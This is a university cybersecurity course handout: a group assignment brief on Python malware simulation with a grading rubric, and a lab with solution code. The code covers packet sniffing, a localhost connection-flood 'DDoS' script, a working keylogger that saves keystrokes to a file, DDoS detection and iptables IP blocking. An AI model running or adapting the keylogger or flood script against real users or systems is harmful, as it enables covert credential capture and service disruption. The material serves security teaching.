
Assignment#1 (1)

The document outlines an assignment for a cybersecurity course focusing on Python-based malware simulation. Students are required to select a type of malware, analyze its impact, and propose mitigation strategies while collaborating in groups. The assignment includes ethical considerations, detailed requirements, and a grading rubric, emphasizing the importance of research and effective presentation skills.

Uploaded by

anas almamary

Cybersecurity Design Principles

CYB 131

Assignment #1

Python-Based Malware Simulation


Overview:
Malware, or malicious software, is a critical threat to information systems worldwide. This
assignment focuses on understanding one type of malware in detail. As a group, students
will explore and analyze the chosen malware, its techniques, intent, and how organizations
can mitigate its impact. This assignment aims to give you practice in explaining the
impact of the selected malware type on the system, in analyzing the cybersecurity design
principles required to protect the system from the malware, and in presentation skills, while
providing a comprehensive understanding of malware threats in the field of cybersecurity.

Ethical Disclaimer

This guide and the attached examples are strictly for educational and research purposes.
Any malware you create is illegal if used maliciously. Practice only in a controlled
environment on your own system. Unauthorized use violates cybersecurity laws.

Assignment Requirements:
1. Select a Malware Type: Choose one specific type of malware (e.g., DDoS Attack,
Keylogging, ransomware, spyware, Trojan horse, etc.).

2. Malware Overview (200-300 words):


- Define the selected malware, including its name and brief history.
- Explain the primary aim of this malware. What does it target? And how does it impact the
system? (e.g., data theft, system disruption, espionage).

3. Applying (150-200 words):

- Write a Python script for simulating the selected malware.
- Give step-by-step guidance for simulating the selected malware, covering the techniques and
methods this malware uses to infiltrate systems, based on how you applied it (e.g.,
phishing, exploiting vulnerabilities, file-less attacks).

4. Intent and Impact (100-150 words):
- Describe the intent behind the malware. What are the possible consequences if a system is
infected?
- Include real-world examples or cases where this malware caused significant damage.

5. Best Practices to Minimize Effect (200-300 words):


- Identify and explain best practices to protect systems and data from this type of malware.
- Include both technical solutions (e.g., firewalls, antivirus, encryption) and non-technical
measures (e.g., user education, access controls).
- Suggest how AI can assist in detecting and preventing this malware (e.g., anomaly
detection using machine learning).

6. References: Include at least 3-5 credible sources that provide information about the
selected malware, using proper citation formats.

Assignment Details:
• Group Work: The assignment should be completed in groups of 3-4 students.
• Length: The report should be 500-700 words in length, not including references.
• Use of AI: Students are encouraged to use AI tools to gather information and enhance
their research. Mention how AI tools contributed to the analysis and what additional
insights were gained through their use.
• Presentation: Present the findings in a clear, structured, and professional manner. Use
headings and subheadings for each section.

Submission Guidelines:
• Deadline: 15 October 2024
• Format: Submit the assignment as a PDF document via blackboard
• Structure: Include a cover page with the group members' names, student IDs, and the
assignment title. Use consistent formatting (e.g., font size 12, Times New Roman, 1.5 line
spacing).

Grading Rubric (Total: 20 Marks):


1. Selection of Malware and Overview (2 marks):
- Clearly identifies a specific malware type.
- Provides an accurate and detailed overview of the malware’s name, history, and aim.

2. Applying the selected Malware (8 marks):


- The Python script for simulating the selected malware.
- Discusses the step-by-step guidance for simulating the selected malware.

3. Intent and Impact (2 marks):


- Clearly describes the malware's intent and the potential impact of an infection.
- Provides relevant examples or case studies to support the analysis.

4. Best Practices to Minimize Effects (2 marks):
- Suggests comprehensive strategies and solutions to mitigate the malware's effects.
- Explores the role of AI in detection and prevention effectively.

5. Use of AI Tools and References (2 marks):


- Describes the use of AI tools in performing the research process.
- Includes at least 3-5 credible references, properly cited.

6. Presentation (4 marks):
- Present the findings about the selected malware in a clear, structured, and professional
manner. Use headings and subheadings for each section.

- Present the screenshots of the Python script created to simulate the selected malware
in a clear, structured manner, describing step by step how the malware performed.

Criteria for Grading:


• Clarity and Depth: The assignment should provide clear explanations with a good depth of
analysis. It should demonstrate a thorough understanding of the malware topic.
• Research Quality: Use of recent and credible sources, including scholarly articles, industry
reports, or news outlets. Usage of AI for analysis will add value.
• Originality: The content must be original and well-crafted, reflecting the group's own
understanding and insights.
• Professionalism: The report should be well-organized, with a logical flow and professional
presentation.

Note:
Focus on collaborating effectively within your group to divide the workload. Explore how AI
tools can aid in your research and provide a unique perspective on the selected malware.
Your detailed analysis, along with current updates, will help deepen your understanding of
cybersecurity threats and defense strategies.

Grading Rubric (Total: 20 Marks):


Levels: Excellent (Full Marks), Good, Satisfactory, Needs Improvement

Selection of Malware and Overview (2 marks)
- Excellent (Full Marks): Clear identification of specific malware with detailed overview and aim.
- Good: Identified malware with adequate overview and aim.
- Satisfactory: Malware identified, but overview lacks depth.
- Needs Improvement: Poor or unclear identification of malware with inadequate overview.

Applying Python script for simulating the selected malware (8 marks)
- Excellent (Full Marks): Thorough explanation of techniques, methods, and spread mechanism.
- Good: Adequate explanation of techniques and methods with some gaps.
- Satisfactory: Basic explanation of techniques, lacks clarity or detail.
- Needs Improvement: Insufficient or unclear explanation of techniques.

Intent and Impact (2 marks)
- Excellent (Full Marks): Clearly describes intent and impact with relevant examples.
- Good: Describes intent and impact with limited examples.
- Satisfactory: Describes intent but lacks impact analysis.
- Needs Improvement: Poor description of intent and impact, lacks examples.

Best Practices to Minimize Effects (2 marks)
- Excellent (Full Marks): Comprehensive strategies and solutions, effectively explores AI role.
- Good: Adequate strategies with some mention of AI role.
- Satisfactory: Basic strategies, minimal exploration of AI role.
- Needs Improvement: Incomplete strategies, no mention of AI role.

Use of AI Tools and References (2 marks)
- Excellent (Full Marks): Effectively describes AI tool usage, includes 3-5 credible references.
- Good: Describes AI tool usage, includes references with minor gaps.
- Satisfactory: Limited AI tool usage description, few references.
- Needs Improvement: Poor or no mention of AI tool usage, lacks references.

Presentation (4 marks)
- Excellent (Full Marks): Demonstrates the content in depth, with a well-organized flow, keeping engagement & interaction with the audience, and managing time effectively. Speaker presents confidently, uses relevant examples, and maintains audience interest throughout.
- Good: Covers the topic well with some depth and a clear organization, though a few minor areas may lack detail. Engages the audience at times but could improve interaction. Time management is mostly effective, with slight variations in pacing.
- Satisfactory: Provides general knowledge, but lacks depth or strong organization. Engagement with the audience is minimal, and the presentation may feel somewhat disconnected or unclear. Time management needs improvement, with some parts feeling rushed or too slow.
- Needs Improvement: Lacks depth, organization, and engagement. The presentation is difficult to follow, with limited interaction with the audience. Speaker struggles with confidence or clarity, and time management is poor, leading to a presentation that is too short, too long, or unbalanced.

CYB 131
Cybersecurity Design Principles

Lab 3
Objective

To practice botnet simulation, attack detection, and mitigation using Python in PyCharm,
with step-by-step guidance.

Exercise 1: Packet Sniffing

Task:

Write a Python script to capture and print network packets using Scapy.

• Filter for TCP traffic on port 80.


• Capture only 10 packets.

Instructions:

1. Install Scapy using pip install scapy.


2. Run the script below.
3. Open a web browser and visit a website.
4. Observe the captured packets.

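# Solution for Exercise 1: Packet Sniffing

from scapy.all import sniff

def packet_callback(packet):
    # Print a one-line summary of each captured packet.
    print(packet.summary())

# Capture 10 TCP packets to or from port 80, then stop.
sniff(filter="tcp port 80", prn=packet_callback, count=10)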

Exercise 2: Simulating a Simple DDoS Attack

Task:

Write a script to simulate multiple HTTP requests to a local server.

• Use Python sockets.


• Send 100 requests to 127.0.0.1:80.

Beginner Instructions:

1. Ensure you have a local web server running.


o Install Flask using pip install flask.
o Create a simple Flask server:

from flask import Flask

app = Flask(__name__)

@app.route('/')
def home():
    return "Server is running!"

if __name__ == "__main__":
    # Listen on the loopback interface only, so the server is reachable just from this machine.
    app.run(host='127.0.0.1', port=80)

o Run the Flask script in a separate terminal.


2. Run the DDoS simulation script below.
3. Observe the requests being logged by the server.

# Solution for Exercise 2: DDoS Simulation

import socket
import threading

def attack(target, port):
    # Open one TCP connection, send a request line, and close.
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        client.send(b"GET / HTTP/1.1\r\n")
        client.close()
    except OSError:
        # Ignore connection errors (e.g. the local server is not running).
        pass

# Loopback address of the local Flask test server from step 1.
target_ip = "127.0.0.1"
target_port = 80

threads = []
for i in range(100):
    thread = threading.Thread(target=attack, args=(target_ip, target_port))
    threads.append(thread)
    thread.start()

Exercise 3: Keylogging Simulation

Task:

Write a keylogger script that:

• Records keystrokes.
• Saves them to a file keylog.txt.

Beginner Instructions:

1. Install keyboard using pip install keyboard.


2. Run the script below.
3. Open a text editor and type anything.
4. Press Ctrl + C in the terminal to stop the script.
5. Open keylog.txt to see recorded keystrokes.

# Solution for Exercise 3: Keylogging

import keyboard

def keylogger():
    # Append the name of each pressed key to keylog.txt, one per line.
    with open("keylog.txt", "a") as log:
        while True:
            event = keyboard.read_event()
            if event.event_type == keyboard.KEY_DOWN:
                log.write(event.name + "\n")

keylogger()

Exercise 4: Detecting DDoS Attempts

Task:

Modify the detection script to:

• Monitor incoming requests.


• Print a warning if an IP makes more than 10 requests.

Beginner Instructions:

1. Run the Flask server from Exercise 2.


2. Simulate multiple requests using the DDoS attack script.
3. Run the detection script below.
4. Observe if an IP gets flagged for too many requests.

# Solution for Exercise 4: DDoS Detection

from collections import defaultdict

# Number of requests seen so far from each source IP.
request_counts = defaultdict(int)

def detect_ddos(ip):
    # Count the request and warn once the IP has made more than 10.
    request_counts[ip] += 1
    if request_counts[ip] > 10:
        print(f"Potential DDoS attack detected from {ip}!")

# Simulate requests
for i in range(12):
    detect_ddos("192.168.1.1")

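The counter above never forgets old requests, so any long-lived client is eventually flagged. As an added example (not part of the original lab), the sketch below applies the same more-than-10 rule inside a sliding time window over Flask development-server log lines; the function names, the 5-second window and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Flask/Werkzeug development-server access-log line, e.g.
# 127.0.0.1 - - [15/Oct/2024 10:00:00] "GET / HTTP/1.1" 200 -
LOG_LINE = re.compile(r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "')

def find_flooders(lines, threshold=10, window_seconds=5):
    """Return {ip: time it first exceeded `threshold` requests within the window}."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = {}
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue              # skip startup banners and malformed lines
        ip = match["ip"]
        ts = datetime.strptime(match["ts"], "%d/%b/%Y %H:%M:%S")
        times = recent[ip]
        times.append(ts)
        # Drop requests that have aged out of the sliding window.
        while (ts - times[0]).total_seconds() > window_seconds:
            times.popleft()
        if len(times) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged

def sample_log():
    """Constructed sample: a burst from 127.0.0.1, slow traffic from 192.168.1.20."""
    lines = [" * Running on http://127.0.0.1:80"]
    # 12 requests within two seconds, a small stand-in for the Exercise 2 burst.
    for i in range(12):
        lines.append(f'127.0.0.1 - - [15/Oct/2024 10:00:{i // 6:02d}] "GET / HTTP/1.1" 200 -')
    # 12 requests spread over 12 minutes: same total, never more than 1 per window.
    for i in range(12):
        lines.append(f'192.168.1.20 - - [15/Oct/2024 10:{i:02d}:30] "GET / HTTP/1.1" 200 -')
    return lines

if __name__ == "__main__":
    for ip, when in find_flooders(sample_log()).items():
        print(f"Potential DDoS attack detected from {ip} at {when}")
```

The slow client sends the same 12 requests as the burst but is not flagged, which the plain counter cannot distinguish.
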
Exercise 5: Blocking Malicious IPs

Task:

Write a Python function to:

• Block an IP using iptables.


• Print confirmation.

Beginner Instructions:

1. Identify an attacking IP from Exercise 4.


2. Run the script below.
3. Verify that the IP is blocked using sudo iptables -L (Linux only).

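# Solution for Exercise 5: Blocking IP

import ipaddress
import subprocess

def block_ip(ip):
    # Validate first so only a real IP address ever reaches iptables.
    addr = str(ipaddress.ip_address(ip))
    # Pass an argument list (no shell) so the value cannot inject extra commands.
    subprocess.run(["sudo", "iptables", "-A", "INPUT", "-s", addr, "-j", "DROP"], check=True)
    print(f"Blocked {addr}")

block_ip("192.168.1.1")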

Note: iptables only works on Linux. If using Windows, manually block the IP in
firewall settings.
